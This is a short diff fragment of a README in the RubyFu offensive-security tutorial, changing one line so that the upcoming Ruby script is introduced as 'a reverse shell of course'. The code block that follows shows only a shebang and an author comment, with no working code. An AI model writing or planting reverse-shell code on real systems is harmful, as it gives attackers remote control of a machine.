rubyfu/RubyFu/module_0x2__system_kungfu/README.md

 So all what to need is to have your application.

-Suppose we have the following script
+Suppose we have the following script, a reverse shell of course ;)
 ```ruby
 #!/usr/bin/env ruby
 # KING SABRI | @KINGSABRI